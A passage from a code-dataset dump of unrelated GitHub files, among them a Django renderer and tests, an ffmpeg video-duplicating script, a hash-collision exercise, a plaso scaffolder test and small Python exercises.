\"\"\" Just like the CamelCaseJSONRenderer, but replaces any MultiLang fields (or things that\n LOOK like multilang fields) and replaces them with a string representing the user's current language.\n\n .. 
code-block:: python\n\n renderer.render({\n \"name\": \"Derek\",\n \"bio\": {\n \"en\": \"From Pittsburgh\",\n \"id\": \"Dari Pittsburgh\"\n }\n })\n\n # this will then return if the request language was set to english\n {\n \"name\": \"Derek\",\n \"bio\": \"From Pittsburgh\"\n }\n\n \"\"\"\n media_type = SUMMARY_FORMAT\n format = 'json'\n\n def render(self, data, accepted_media_type=None, renderer_context=None):\n # TODO: this is ugly as sin.. needs refactored heavily.\n if isinstance(data, list):\n for element in data:\n enabled_languages = sorted([t[0] for t in settings.LANGUAGES])\n for k, v in element.items():\n if isinstance(v, dict) and enabled_languages == sorted(v.keys()):\n preferred_language = settings.LANGUAGE_CODE\n try:\n preferred_language = get_language_from_request(renderer_context['request'])\n except Exception:\n pass\n element[k] = v[preferred_language[:2]] # make if something like en-US, just get 'en'\n elif isinstance(data, dict):\n enabled_languages = sorted([t[0] for t in settings.LANGUAGES])\n for k, v in data.items():\n if isinstance(v, dict) and enabled_languages == sorted(v.keys()):\n preferred_language = settings.LANGUAGE_CODE\n try:\n preferred_language = get_language_from_request(renderer_context['request'])\n except Exception:\n pass\n data[k] = v[preferred_language[:2]] # make if something like en-US, just get 'en'\n return super(SummaryCamelCaseRenderer, self).render(\n data,\n accepted_media_type=accepted_media_type,\n renderer_context=renderer_context\n )\n\n\nclass FullCamelCaseRenderer(CamelCaseJSONRenderer):\n media_type = FULL_FORMAT\n format = 'json+full'\n\n\ndef custom_jwt_payload_hander(user):\n username_field = get_username_field()\n username = get_username(user)\n\n warnings.warn(\n 'The following fields will be removed in the future: '\n '`email` and `user_id`. 
',\n        DeprecationWarning\n    )\n\n    payload = {\n        'user_id': user.pk,\n        'email': user.email,\n        'username': username,\n        'exp': datetime.utcnow() + api_settings.JWT_EXPIRATION_DELTA\n    }\n    if isinstance(user.pk, uuid.UUID):\n        payload['user_id'] = str(user.pk)\n\n    payload[username_field] = username\n\n    # Include original issued at time for a brand new token,\n    # to allow token refresh\n    if api_settings.JWT_ALLOW_REFRESH:\n        payload['orig_iat'] = timegm(\n            datetime.utcnow().utctimetuple()\n        )\n\n    if api_settings.JWT_AUDIENCE is not None:\n        payload['aud'] = api_settings.JWT_AUDIENCE\n\n    if api_settings.JWT_ISSUER is not None:\n        payload['iss'] = api_settings.JWT_ISSUER\n\n    payload['first_name'] = user.first_name if user.first_name else ''\n    payload['last_name'] = user.last_name if user.last_name else ''\n\n    return payload\n","repo_name":"rezapyon/sms-backend","sub_path":"utils/drf.py","file_name":"drf.py","file_ext":"py","file_size_in_byte":9151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"}
{"seq_id":"24690530235","text":"from dataclasses import dataclass, field\nimport environ\nimport pathlib\n\n\n# the settings are extracted into a separate object to reduce code coupling\n# this also makes it easier to write automated tests\n\n\n@dataclass\nclass Settings:\n    # Environment object that the parameters are read from.\n    env: environ.Env = field(default_factory=environ.Env)\n    # Path to the .env file.\n    env_path: pathlib.Path = field(default=None)\n    # Path to the project root.\n    BASE_DIR: pathlib.Path = field(init=False)\n\n    # Project settings\n    # URL of the extractor redis.\n    EXTRACTOR_TO_TRANSFORMER_QUERY_HOST: str = field(init=False)\n    # URL of the transformer redis.\n    TRANSFORMER_TO_LOADER_QUERY_HOST: str = field(init=False)\n\n    def __post_init__(self):\n        self.BASE_DIR = pathlib.Path(__file__).resolve().parent.parent\n        self.env_path = self.BASE_DIR / \".env\" if not self.env_path else self.env_path\n        environ.Env.read_env(self.env_path.as_posix())\n        self.EXTRACTOR_TO_TRANSFORMER_QUERY_HOST: str = self.env.str(\n            \"EXTRACTOR_TO_TRANSFORMER_QUERY_HOST\"\n        )\n        self.TRANSFORMER_TO_LOADER_QUERY_HOST: str = self.env.str(\n            \"TRANSFORMER_TO_LOADER_QUERY_HOST\"\n        )\n\n\nsettings = Settings()\n","repo_name":"PORT-21/ETL_template","sub_path":"app/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"44059767632","text":"import pytest\nfrom datetime import date\nfrom django.urls import reverse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom app.models.mensalidade import Mensalidade\nfrom app.models.competencia import Competencia\nfrom app.models.associado import Associado\nfrom app.models.alinea import Alinea\nfrom app.models.contratacao import Contratacao\nfrom app.models.contrato import Contrato\n\n\ndef create_mensalidade():\n    contrato = Contrato.objects.create(nome=\"Contrato Nome\")\n    competencia = Competencia.objects.create(ano='2020', mes='01', data=date.today())\n    associado = Associado.objects.create(nome=\"Associado Nome\")\n    mensalidade = Mensalidade.objects.create(\n        competencia=competencia, associado=associado, data_vence=date.today())\n    contratacao = Contratacao.objects.create(\n        contrato=contrato, associado=associado, descricao='Descrição', valor=1.00, ativa=True)\n    Alinea.objects.create(mensalidade=mensalidade, contratacao=contratacao, valor=15)\n    return [mensalidade, associado]\n\n\n\n@pytest.mark.django_db\ndef 
test_mensalidade_show(auto_login_user):\n mensalidade, _ = create_mensalidade()\n client, _user = auto_login_user()\n response = client.get(reverse('mensalidade_show', kwargs={'mensalidade_id':mensalidade.id}))\n assert response.status_code == 200\n for string in [b'Associado Nome', b'Contrato Nome', bytes('Descrição', 'utf-8')]:\n assert string in response.content\n\n\n@pytest.mark.django_db\ndef test_mensalidade_edit_user(auto_login_user):\n client, _user = auto_login_user()\n mensalidade, _ = create_mensalidade()\n response = client.get(reverse('mensalidade_edit', kwargs={'mensalidade_id':mensalidade.id}))\n assert response.status_code == 302\n\n\n@pytest.mark.django_db\ndef test_mensalidade_edit(admin_client):\n mensalidade, _ = create_mensalidade()\n response = admin_client.get(reverse('mensalidade_edit', kwargs={'mensalidade_id':mensalidade.id}))\n assert response.status_code == 200\n response = admin_client.post(\n reverse('mensalidade_edit', kwargs={'mensalidade_id':mensalidade.id}),\n data=dict(data_vence=f\"{date.today()}\"), follow=True)\n assert response.status_code == 200\n assert b'Registro salvo com sucesso' in response.content\n\n\n@pytest.mark.django_db\ndef test_mensalidade_pay(auto_login_user):\n client, _user = auto_login_user()\n mensalidade, associado = create_mensalidade()\n response = client.get(reverse('associado_show', kwargs={'associado_id':associado.id}))\n assert response.status_code == 200\n assert b'Receber' in response.content\n response = client.get(reverse('mensalidade_pay', kwargs={'mensalidade_id':mensalidade.id}))\n assert response.status_code == 200\n response = client.post(\n reverse('mensalidade_pay', kwargs={'mensalidade_id':mensalidade.id}),\n data=dict(data_pgto=f\"{date.today()}\", valor_pgto=15), follow=True)\n assert response.status_code == 200\n assert b'Registro salvo com sucesso' in response.content\n assert b'Receber' not in response.content\n\n\n@pytest.mark.django_db\ndef test_mensalidade_print(auto_login_user):\n mensalidade, _ = create_mensalidade()\n client, _user = auto_login_user()\n response = client.get(reverse('mensalidade_print', kwargs={'mensalidade_id':mensalidade.id}))\n assert response.status_code == 200\n for string in [b'Associado Nome', b'Contrato Nome', bytes('Descrição', 'utf-8')]:\n assert string in response.content\n\n\n@pytest.mark.django_db\ndef test_mensalidade_print_associado(auto_login_user):\n mensalidade, _ = create_mensalidade()\n client, _user = auto_login_user()\n response = client.get(reverse('mensalidade_print_associado', kwargs={'associado_id':mensalidade.associado.id}))\n assert response.status_code == 200\n for string in [b'Associado Nome', b'Contrato Nome', bytes('Descrição', 'utf-8')]:\n assert string in response.content\n\n\n@pytest.mark.django_db\ndef test_mensalidade_print_competencia(auto_login_user):\n mensalidade, _ = create_mensalidade()\n client, _user = auto_login_user()\n response = client.get(reverse('mensalidade_print_competencia', kwargs={'competencia_id':mensalidade.competencia.id}))\n assert response.status_code == 200\n for string in [b'Associado Nome', b'Contrato Nome', bytes('Descrição', 'utf-8')]:\n assert string in response.content\n","repo_name":"Kdio/django","sub_path":"tests/views/mensalidade_views_test.py","file_name":"mensalidade_views_test.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32355827692","text":"from Crypto.Hash import SHA256 as sha\nfrom math import 
ceil\nimport pprint as pp\n\ndef compByte(b1, b2):\n    # Comparing the bit lengths alone already determines how many of the 8 bits are shared leading zeros.\n    xor = b1 ^ b2\n    # print('comparing: ', b1, b2)\n    # print('binary form: {}({}) {}({})'.format(bin(b1), len(bin(b1))-2, bin(b2), len(bin(b2))-2))\n    # print('XOR output: ', bin(xor))\n\n    # bin(byte) will produce the string output of the bits in the notation '0b00110011' \n    # so the first 2 chars unused. If 2 bytes share a smaller length, then the \n    # first bits collide with the fact that they're both 0.\n    b1N = len(bin(b1)) - 2\n    b2N = len(bin(b2)) - 2\n    \n    # Bits matching (leading zeros if both aren't using all 8 bits)\n    bits = 8 - b1N if b1N > b2N else 8 - b2N\n\n    if b1N == b2N:\n        # Xor starts where bits differ, so look at the length of the xor.\n        if xor == 0: \n            bits = 8\n        else:\n            bits = 8 - int(len(bin(xor))-2)\n\n    # print('leading bits similar: {}'.format(bits))\n\n    return bits\n\n# Will compare last hash with all those before\ndef compHash(hash1, hash2):\n    bits = 0\n    for i, char1 in enumerate(hash1):\n        bits += compByte(char1, hash2[i])\n        if (bits % 8 != 0) | (bits == 0):\n            # print(\"bits collided: {}\".format(bits))\n            break\n        else:\n            if i == 3:\n                print('we found a duplicate value?')\n            else:\n                print(\"STILL GOING!\")\n\n    return bits\n\n    \ndef debugCompByte():\n    H = sha.new()\n    H.update(b'sideshawkin')\n    h0 = H.digest()\n    print(h0[0])\n    for g in range(len(h0)-1):\n        compByte(h0[g], h0[g+1])\n    \n\n# Once a handful of hashes have been calculated, this is the race that will compare hash outcomes\ndef startRace(h):\n    collisions = []\n    sameVals = []\n    tortInd = 0\n    hareInd = 1\n    tort = h[tortInd]\n    hare = h[hareInd]\n    for i in range(int(len(h)/2)):\n\n        tortInd += 1\n        hareInd += 2\n        tort = h[tortInd]\n        hare = h[hareInd]\n\n        if tort == hare:\n            sameVals.append((tortInd, h[tortInd-1], hareInd, h[hareInd-1]))\n            continue\n        \n        if compHash(tort, hare) >= 16:\n            newHash = sha.new(h[tortInd-1])\n            recomputedT = newHash.digest()\n            newHash = sha.new(h[hareInd-1])\n            recomputedH = newHash.digest()\n            pair = ({\n                'valueT': h[tortInd-1],\n                'hashedT': h[tortInd],\n                'computedT': recomputedT\n            },\n            {\n                'valueH': h[hareInd-1],\n                'hashedH': h[hareInd],\n                'computedH': recomputedH\n\n            })\n\n            collisions.append(pair)\n            print(\"Hash collision of 16 MSB bits\")\n            break\n    \n    return collisions,sameVals\n\n\nhashes = []\n\nhashCount = 200000\nbitTarget = 16\nbyteTarget = ceil(bitTarget/8)\nprint('Hashing {} times'.format(hashCount))\nprint('byteTarget {}'.format(byteTarget))\n\nprev = b'sideshawkin'\nfor i in range(hashCount):\n    H = sha.new(prev)\n    prev = H.digest()[:byteTarget]\n    hashes.append(prev)\n    \n\nprint(\"{} hashes computed\".format(hashCount))\nprint(\"Looking for collisions...\")\n\ncollides, sameVals = startRace(hashes)\n\nprint(\"Finished searching for collisions...\")\nprint(\"Found: \")\nfor val in collides:\n    pp.pprint(val[0])\n    pp.pprint(val[1])\n\nfor same in sameVals:\n    pp.pprint(same)\n\n","repo_name":"the-sides/wyaCollisions","sub_path":"py/hasher.py","file_name":"hasher.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"21667483978","text":"\"\"\"\r\n10. 
Try with single except: WAP which will take two integer numbers as input and perform division of them.\r\n\t- User of this program is not smart and can input anything as part of input\r\n\t- Handle ArithmaticError, ZeroDivisionError and ValueError\r\n\t- Print exception information\r\n\r\n\"\"\"\r\ntry:\r\n a=int(input())\r\n b=int(input())\r\n print(a//b)\r\n\r\nexcept (ArithmeticError, ZeroDivisionError, ValueError):\r\n print(\"Error occured\")\r\n","repo_name":"kunal27071999/KunalAgrawal_Week_3","sub_path":"Week_3_ExceptionHandling_Q10.py","file_name":"Week_3_ExceptionHandling_Q10.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31945387488","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"Tests for the plaso sqlite scaffolder.\"\"\"\nimport unittest\n\nfrom l2tscaffolder.lib import errors\nfrom l2tscaffolder.scaffolders import plaso_sqlite\n\n\nclass PlasoSQLiteScaffolderTest(unittest.TestCase):\n \"\"\"Test class for the plaso sqlite scaffolder.\"\"\"\n\n maxDiff = None\n\n def _RunQueryTests(self, scaffolder, test_string, expected_columns):\n \"\"\"Test query columns function.\n\n Args:\n scaffolder (plaso_sqlite.PlasoSQLiteScaffolder): scaffolder to test.\n test_string (str): string to test the _GetQueryColumns method on.\n expected_columns (set[str]): columns names expected to be extracted from\n the test string.\n \"\"\"\n # pylint: disable=protected-access\n columns = set(list(scaffolder._GetQueryColumns(test_string)))\n self.assertEqual(columns, expected_columns)\n\n def testQueryColumns(self):\n \"\"\"Test query columns function.\"\"\"\n scaffolder = plaso_sqlite.PlasoSQLiteScaffolder()\n test_string = (\n 'SELECT foobar as Foo, foobar.dot, random, reallylong AS long FROM '\n 'foobarengine WHERE foobar = 1')\n expected_columns = set(['foo', 'dot', 'random', 'long'])\n self._RunQueryTests(scaffolder, test_string, expected_columns)\n\n test_string = (\n 'select one, two as three, four as five, f.eight as EIGHTE FROM '\n 'foobar f, scode s WHERE f.id = s.id ORDER BY one')\n expected_columns = set(['one', 'three', 'five', 'eighte'])\n self._RunQueryTests(scaffolder, test_string, expected_columns)\n\n test_string = (\n 'this should not produce anything...')\n self._RunQueryTests(scaffolder, test_string, set())\n\n def testPlasoSQLiteScaffolder(self):\n \"\"\"Test the plaso SQLite scaffolder.\"\"\"\n scaffolder = plaso_sqlite.PlasoSQLiteScaffolder()\n\n scaffolder.SetOutputName('testing')\n\n with self.assertRaises(errors.ScaffolderNotConfigured):\n scaffolder.RaiseIfNotReady()\n\n queries = {\n 'Strange': 'SELECT name, address, ssn FROM strange',\n 'Foobar': (\n 'SELECT f1.foo, f2.bar AS Bar FROM foobar_one AS f1, '\n 'foobar_two as f2 WHERE f1.id = f2.id')}\n required_tables = ['foobar_one', 'foobar_two', 'strange_table']\n scaffolder.SetAttribute('queries', queries, dict)\n scaffolder.SetAttribute('required_tables', required_tables, list)\n scaffolder.SetAttribute('test_file', 'test_data/test_sqlite.db', str)\n\n file_copy_paths = [x for _, x in scaffolder.GetFilesToCopy()]\n self.assertEqual(file_copy_paths, ['test_data/test_sqlite.db'])\n\n files_generated = dict(scaffolder.GenerateFiles())\n\n expected_files = frozenset([\n 'plaso/formatters/testing.py', 'tests/formatters/testing.py',\n 'plaso/parsers/sqlite_plugins/testing.py',\n 'tests/parsers/sqlite_plugins/testing.py'])\n self.assertEqual(set(files_generated.keys()), expected_files)\n\n expected_init_files = 
frozenset([\n 'plaso/formatters/__init__.py',\n 'plaso/parsers/sqlite_plugins/__init__.py'])\n init_generated = dict(scaffolder.GetInitFileChanges())\n self.assertEqual(set(init_generated.keys()), expected_init_files)\n\n expected_parser_init_addition = (\n 'from '\n 'plaso.parsers.sqlite_plugins import testing\\n')\n self.assertEqual(\n expected_parser_init_addition,\n init_generated['plaso/parsers/sqlite_plugins/__init__.py'])\n\n with open('test_data/plaso_testing_sqlite_plugin.py', 'r') as fh:\n expected_parser_content = fh.read()\n self.assertEqual(\n expected_parser_content,\n files_generated['plaso/parsers/sqlite_plugins/testing.py'])\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"log2timeline/l2tscaffolder","sub_path":"tests/scaffolders/plaso_sqlite.py","file_name":"plaso_sqlite.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"8553338553","text":"def create_dict(d, st):\n for c in st:\n if c.isalnum():\n if c not in d:\n d[c] = 1\n else:\n d[c] += 1\n\n\ndef comparedict(d1, d2):\n diff = {}\n for k, v in d1.items():\n if k in d2:\n diff[k] = v - d2[k]\n else:\n diff[k] = v\n return diff\n\n\ndef checkdiff(diff):\n ans = []\n for k, v in diff.items():\n if v > 0:\n ans.append([k, v])\n return ans\n\n\ndef printans(s, ans):\n print(s)\n if len(ans) == 0:\n print(' - None')\n else:\n for l, n in ans:\n print(' - remove', n, l, end='')\n if n > 1:\n print('\\'s')\n else:\n print()\n\n\ns1 = input()\ns2 = input()\ns1lower = s1.lower()\ns2lower = s2.lower()\nd1 = {}\nd2 = {}\ncreate_dict(d1, s1lower)\ncreate_dict(d2, s2lower)\ndiff1 = comparedict(d1, d2)\ndiff2 = comparedict(d2, d1)\nans1 = checkdiff(diff1)\nans2 = checkdiff(diff2)\nans1.sort()\nans2.sort()\nprintans(s1, ans1)\nprintans(s2, ans2)\n","repo_name":"bosswt/CUComProg","sub_path":"P2/P2_05.py","file_name":"P2_05.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"14546499841","text":"import os\nimport string\nimport operator\nspam_path = \"hw5_spam_dist/dist/spam/\"\nham_path = \"hw5_spam_dist/dist/ham/\"\nspam_emails = []\nham_emails = []\nprint(\"asdf\")\nfor spam_email in os.listdir(spam_path):\n print(spam_email)\n f = open(spam_path + spam_email, 'r', errors='ignore')\n spam_emails.append(f.read())\nfor ham_email in os.listdir(ham_path):\n print(ham_email)\n f = open(ham_path + ham_email, 'r', errors='ignore')\n ham_emails.append(f.read())\nfor x in range(len(spam_emails)):\n print(x)\n spam_emails[x] = spam_emails[x].split()\nfor x in range(len(ham_emails)):\n print(x)\n ham_emails[x] = ham_emails[x].split()\nspam_words = {}\nham_words = {}\nfor x in spam_emails:\n for y in x:\n if y in spam_words:\n spam_words[y] += 1\n else:\n spam_words[y] = 1\nfor x in ham_emails:\n for y in x:\n if y in ham_words:\n ham_words[y] += 1\n else:\n ham_words[y] = 1\n\ndifference = {}\ndivide = {}\nboth = set(spam_words.keys()) & set(ham_words.keys())\nspam = set(spam_words.keys()) - set(ham_words.keys())\nham = set(ham_words.keys()) - set(spam_words.keys())\nfor z in both:\n difference[z] = spam_words[z] - ham_words[z]\n divide[z] = (spam_words[z] / ham_words[z], spam_words[z] - ham_words[z])\n\n\n\n\n\nsorted_differences = sorted(difference.items(), key=operator.itemgetter(1))\nsorted_divide = sorted(divide.items(), key=operator.itemgetter(1))\nprint([x for x in sorted_divide if x[1][1] < 
-5000])","repo_name":"georgew5656/kaggleclassifications","sub_path":"hw5/spam_features.py","file_name":"spam_features.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"74260204089","text":"\"\"\"Data\"\"\"\nfrom typing import Any\n\nfrom crawlerstack_spiderkeeper_forwarder.forwarder.base import BaseTask\n\n\nclass DataPublishTask(BaseTask):\n    \"\"\"Data publish task\"\"\"\n    NAME = 'spiderkeeper-data'\n\n    def gen_queue_name(self, task_name: str) -> str:\n        \"\"\"Generate Queue name.\"\"\"\n        return f'{self.queue_name}-{task_name}'\n\n    def gen_routing_key(self, task_name: str) -> str:\n        \"\"\"Routing key.\"\"\"\n        return f'{self.routing_key}-{task_name}'\n\n    async def publish(self, body: Any, **_):\n        \"\"\"\n        Publish message\n        :param body:\n        :return:\n        \"\"\"\n        task_name = _.get('task_name')\n        await self.kombu.publish(\n            queue_name=self.gen_queue_name(task_name),\n            routing_key=self.gen_routing_key(task_name),\n            exchange_name=self.exchange_name,\n            body=body\n        )\n","repo_name":"crawlerstack/crawlerstack-spiderkeeper","sub_path":"src/crawlerstack_spiderkeeper_forwarder/forwarder/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"16854544051","text":"from collections import deque\n\n\ndef solution(board):\n    answer = 0\n    N, M = len(board), len(board[0])\n    deq = deque()\n    matrix = [[999999999] * M for _ in range(N)]\n\n    # find R, G\n    for i in range(N):\n        for j in range(M):\n            if board[i][j] == 'R':\n                deq.append((i, j, 0))\n                matrix[i][j] = 0\n\n    dx = [-1, 1, 0, 0]\n    dy = [0, 0, -1, 1]\n\n    while deq:\n        x, y, cnt = deq.popleft()\n\n        if board[x][y] == 'G':\n            return cnt\n\n        for i in range(4):\n            nx = x\n            ny = y\n\n            while 0 <= nx + dx[i] < N and 0 <= ny + dy[i] < M and board[nx + dx[i]][ny + dy[i]] != 'D':\n                nx += dx[i]\n                ny += dy[i]\n\n            if matrix[nx][ny] > cnt + 1:\n                matrix[nx][ny] = cnt + 1\n                deq.append((nx, ny, cnt + 1))\n\n    return -1\n","repo_name":"Hwan9915/CodeJudge","sub_path":"programmers/LEVEL 2/169199.py","file_name":"169199.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"35184505262","text":"import ffmpeg\nimport os\nimport random\nfrom tqdm import tqdm\n\nDIR = \"input\"\nOUTPUT = \"output\"\n\nKEYWORDS = [\n    \"becomingafemmefatale\",\n    \"femmefatale\",\n    \"seduction\",\n    \"manipulation\",\n    \"viral\",\n    \"power\",\n    \"foryou\",\n    \"fyp\",\n    \"darkfeminine\",\n    \"darkfemininity\",\n    \"darkfeminineenergy\",\n    \"darkfemme\",\n    \"maneater\",\n    \"confidence\",\n    \"siren\",\n    \"learnontiktok\",\n]\n\n\ndef get_metadata_dict(video_keywords_str):\n    metadata_title = video_keywords_str.replace(\"_\", \" \")\n    metadata_description = \"#\" + video_keywords_str.replace(\"_\", \" #\")\n    metadata_keywords = video_keywords_str.replace(\"_\", \",\")\n\n    metadata_dict = {\n        \"metadata:g:0\": f\"title={metadata_title}\",\n        \"metadata:g:1\": f\"description={metadata_description}\",\n        \"metadata:g:2\": f\"keywords={metadata_keywords}\",\n    }\n    return metadata_dict\n\n\ndef get_unique_name_and_metadata(str_effect=\"\"):\n    \"\"\"Generate a unique name for the video\n\n    Args:\n        str_effect (str, optional): String to append to the name related to the effect. 
Defaults to \"\".\n\n Returns:\n str: Unique name for the video\n \"\"\"\n\n video_keywords = random.sample(KEYWORDS, 5)\n unique_hash = random.randint(10000000, 99999999)\n video_keywords_str = \"_\".join(video_keywords)\n file_name = f\"{unique_hash}_{video_keywords_str}_{str_effect}.mp4\"\n\n metadata_dict = get_metadata_dict(video_keywords_str)\n\n return file_name, metadata_dict\n\n\ndef get_video_dimensions(path):\n \"\"\"Get the dimensions of the video\n\n Args:\n path (str): Path to the video\n\n Returns:\n tuple: Height, Width dimensions of the video\n \"\"\"\n probe = ffmpeg.probe(path)\n video_stream = next(\n (stream for stream in probe[\"streams\"] if stream[\"codec_type\"] == \"video\"), None\n )\n width = int(video_stream[\"width\"])\n height = int(video_stream[\"height\"])\n return width, height\n\n\ndef zoom_video(path, factor_percent=110):\n \"\"\"Zoom in the video by a factor of factor_percent\n\n Args:\n path (str): Path to the video\n factor_percent (int, optional): Zoom factor. Defaults to 110.\n\n Returns:\n bool: True if the video was successfully processed, False otherwise\n \"\"\"\n\n factor_str = str(factor_percent)\n video_name, metadata = get_unique_name_and_metadata(f\"z_{factor_str}\")\n res_file_name = os.path.join(OUTPUT, video_name)\n try:\n width, height = get_video_dimensions(path)\n (\n ffmpeg.input(path)\n .filter(\"scale\", w=width * (factor_percent / 100), h=-1)\n .filter(\"crop\", w=width, h=height)\n .output(\n res_file_name,\n loglevel=\"quiet\",\n map_metadata=-1,\n map=\"0:a\", # map all audio streams\n **metadata,\n )\n .run()\n )\n return True\n except ffmpeg.Error as e:\n print(e.stderr)\n return False\n\n\ndef flip_video(path):\n print(f\"Flipping {path}\")\n \"\"\"Flip the video horizontally\n\n Args:\n path (str): Path to the video\n\n Returns:\n bool: True if the video was successfully processed, False otherwise\n \"\"\"\n\n # Flip is done after zooming, so we take the original video name and append the effect\n processed_video_name = os.path.basename(path)\n processed_video_effect = processed_video_name.split(\"_\")[-1].split(\".\")[0]\n video_name, metadata = get_unique_name_and_metadata(f\"{processed_video_effect}_f\")\n res_file_name = os.path.join(OUTPUT, video_name)\n try:\n (\n ffmpeg.input(path)\n .filter(\"hflip\")\n .output(\n res_file_name,\n loglevel=\"error\",\n map_metadata=-1,\n map=\"0:a\", # map all audio streams\n **metadata,\n )\n .run()\n )\n return True\n except ffmpeg.Error as e:\n print(\"Error while flipping video\")\n print(e)\n return False\n\n\ndef copy_video(path):\n \"\"\"Copy the video\n\n Args:\n path (str): Path to the video\n\n Returns:\n bool: True if the video was successfully processed, False otherwise\n \"\"\"\n\n video_name, metadata = get_unique_name_and_metadata(\"o\")\n res_file_name = os.path.join(OUTPUT, video_name)\n try:\n (\n ffmpeg.input(path)\n .output(\n res_file_name,\n loglevel=\"quiet\",\n map_metadata=-1,\n **metadata,\n )\n .run()\n )\n return True\n except ffmpeg.Error as e:\n print(e.stderr)\n return False\n\n\ndef cleanup():\n \"\"\"Delete all videos in the output folder\"\"\"\n print(\"Cleaning up output folder...\")\n files = os.listdir(OUTPUT)\n for file in files:\n os.remove(os.path.join(OUTPUT, file))\n\n\ndef init():\n \"\"\"Create the output folder if it doesn't exist\"\"\"\n if not os.path.exists(OUTPUT):\n os.mkdir(OUTPUT)\n\n\ndef main():\n \"\"\"Generate duplicate videos with different effects\"\"\"\n init()\n cleanup()\n print(\"Zooming on videos...\")\n 
videos_to_process = os.listdir(DIR)\n for video in tqdm(videos_to_process):\n video_path = os.path.join(DIR, video)\n copy_video(video_path)\n zoom_video(video_path, factor_percent=105)\n zoom_video(video_path, factor_percent=110)\n\n print(\"Flipping videos...\")\n videos_to_process = os.listdir(OUTPUT)\n for video in tqdm(videos_to_process):\n video_path = os.path.join(OUTPUT, video)\n flip_video(video_path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"0xRyN/Video-Duplicator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39163087889","text":"from app.api.amenity_routes import amenities\nfrom flask import Blueprint, jsonify, request\nfrom flask_login import login_required, current_user\nfrom app.models import db, Amenity, Farm\n\nsearch_routes = Blueprint(\"search\", __name__)\n\n\n@search_routes.route(\"/\", methods=[\"POST\"])\ndef searchAmenities():\n\n searchedAmenity = request.json\n\n trueList = []\n\n for key, value in searchedAmenity.items():\n if value is True:\n trueList.append(key)\n\n amenities = Amenity.query.filter(Amenity.amenityName.in_(trueList)).all()\n \n farms = []\n\n [farms.extend(a.farms) for a in amenities]\n\n results = list(set(farms))\n\n return {\"results\": [result.to_dict() for result in results]}","repo_name":"simzeee/FindAFarm","sub_path":"app/api/search_routes.py","file_name":"search_routes.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"20737540266","text":"from textwrap import dedent\nclass Students:\n num_of_students = 0\n num_of_friends = 2\n\n def __init__(self,name,roll_no,email):\n self.name = name\n self.roll_no = roll_no\n self.email = email\n Students.num_of_students += 1\n\n def printing(self):\n return dedent(\"\"\"\n Name = {}\n Roll Number = {}\n email = {}\n \"\"\".format(self.name,self.roll_no,self.email))\n\n def friends(self):\n return \"{}\".format(self.num_of_friends)\n\n\nprint(Students.num_of_students)\n\nNandita = Students(\"Nandita\",35,\"nanditasharma@gmail.com\")\nPareksha = Students(\"Pareksha\",18,\"pareksha.manchanda@gmail.com\")\nPurnima = Students(\"Purnima\",22,\"purnaima@yahoo.com\")\n\nprint(Students.num_of_students)\n\nprint(Nandita.printing())\nprint(Students.printing(Pareksha))\nprint(Purnima.printing())\n\n\n\nprint(Students.num_of_friends)\nNandita.num_of_friends = 3\nprint(Nandita.__dict__)\nprint(Nandita.num_of_friends)\n","repo_name":"pareksha/Learning_python","sub_path":"classes_examples/ex_2.py","file_name":"ex_2.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10981806034","text":"import configparser\nimport psycopg2\nfrom sql_queries import create_table_queries, drop_table_queries\n\n\ndef drop_tables(cur, conn):\n \"\"\"\n Drops each table using the queries in `drop_table_queries` list.\n \"\"\"\n for query in drop_table_queries:\n try:\n cur.execute(query)\n except psycopg2.Error as e: \n print(\"Error: Issue dropping table\")\n print (e)\n \n try:\n conn.commit()\n except psycopg2.Error as e:\n print(\"Error: Issue commiting to DB\")\n print (e)\n\ndef create_tables(cur, conn):\n \"\"\"\n Creates each table using the queries in `create_table_queries` list. 
